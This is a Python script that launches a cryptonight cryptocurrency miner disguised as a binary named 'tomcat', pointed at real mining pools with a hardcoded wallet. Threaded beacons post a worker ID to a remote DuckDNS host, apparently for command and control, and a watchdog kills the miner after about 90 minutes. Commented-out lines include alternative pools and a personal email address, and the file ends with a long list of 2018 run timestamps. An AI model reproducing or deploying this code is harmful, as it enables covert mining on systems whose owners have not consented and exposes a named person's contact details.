import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:04.923457
#2018-02-17 17:21:03.604492
#2018-02-17 19:08:06.851088
#2018-02-17 20:58:07.063405
#2018-02-17 22:44:05.265160
#2018-02-18 00:28:05.187608
#2018-02-18 02:19:05.388547
#2018-02-18 04:06:06.518373
#2018-02-18 05:55:07.225041
#2018-02-18 07:47:04.063135
#2018-02-18 09:35:07.983636
#2018-02-18 11:21:05.772431
#2018-02-18 13:07:03.450833
#2018-02-18 14:54:05.627108
#2018-02-18 16:43:06.812893
#2018-02-18 18:32:04.856506
#2018-02-18 20:20:04.861351
#2018-02-18 22:06:02.187996
#2018-02-18 23:54:04.487572
#2018-02-19 01:40:05.450372
#2018-02-19 03:28:04.017371
#2018-02-19 05:13:01.666834
#2018-02-19 06:59:05.622349
#2018-02-19 08:47:06.383632
#2018-02-19 10:36:06.803155
#2018-02-19 12:23:05.864055
#2018-02-19 14:09:07.073082
#2018-02-19 15:59:07.903668
#2018-02-19 17:47:09.415062
#2018-02-19 19:35:03.696107
#2018-02-19 21:22:03.725898
#2018-02-19 23:08:01.851722
#2018-02-20 00:53:03.821732
#2018-02-20 02:42:01.450812
#2018-02-20 04:30:09.291631
#2018-02-20 06:14:06.845539
#2018-02-20 07:59:01.961543
#2018-02-20 09:44:06.111305
#2018-02-20 11:28:07.006570
#2018-02-20 13:15:06.983634
#2018-02-20 15:02:01.877448
#2018-02-20 16:45:10.113160
#2018-02-20 18:33:01.319936
#2018-02-20 20:25:07.668218
#2018-02-20 22:10:03.089003
#2018-02-20 23:52:08.113927
#2018-02-21 01:39:01.835050
#2018-02-21 03:26:02.200802
#2018-02-21 05:14:06.817352
#2018-02-21 07:02:07.188852
#2018-02-21 08:48:01.914183
#2018-02-21 10:34:08.070564
#2018-02-21 12:22:01.827787
#2018-02-21 14:08:04.048115
#2018-02-21 15:53:08.443897
#2018-02-21 17:44:01.338157
#2018-02-21 19:29:07.049201
#2018-02-21 21:17:07.466835
#2018-02-21 23:05:03.817463
#2018-02-22 00:54:08.313192
#2018-02-22 02:42:03.961628
#2018-02-22 04:29:03.822147
#2018-02-22 06:14:04.018450
#2018-02-22 08:01:07.424689
#2018-02-22 09:49:04.792938
#2018-02-22 11:34:01.990516
#2018-02-22 13:20:10.357272
#2018-02-22 15:09:09.491762
#2018-02-22 16:53:07.413836
#2018-02-22 18:43:07.026414
#2018-02-22 20:36:09.594488
#2018-02-22 22:22:07.894823
#2018-02-23 00:09:04.521757
#2018-02-23 01:57:06.787020
#2018-02-23 03:43:07.238738
#2018-02-23 05:27:04.585679
#2018-02-23 07:13:04.664475
#2018-02-23 09:18:08.565664
#2018-02-23 11:25:07.291241
#2018-02-23 13:15:06.654487
#2018-02-23 15:01:01.572098
#2018-02-23 16:49:04.386457
#2018-02-23 18:37:04.101360
#2018-02-23 20:25:08.578667
#2018-02-23 22:12:05.204596
#2018-02-23 23:58:06.515167
#2018-02-24 01:47:06.947002
#2018-02-24 03:33:06.709881
#2018-02-24 05:17:07.424767
#2018-02-24 07:04:04.850081
#2018-02-24 08:51:07.091301
#2018-02-24 10:52:01.274583
#2018-02-24 12:40:04.165099
#2018-02-24 14:28:01.320694
#2018-02-24 16:16:06.425477
#2018-02-24 18:08:05.733503
#2018-02-24 19:54:05.361970
#2018-02-24 21:39:05.147011
#2018-02-25 00:28:07.275235
#2018-02-25 04:10:07.593996
#2018-02-25 07:41:04.089628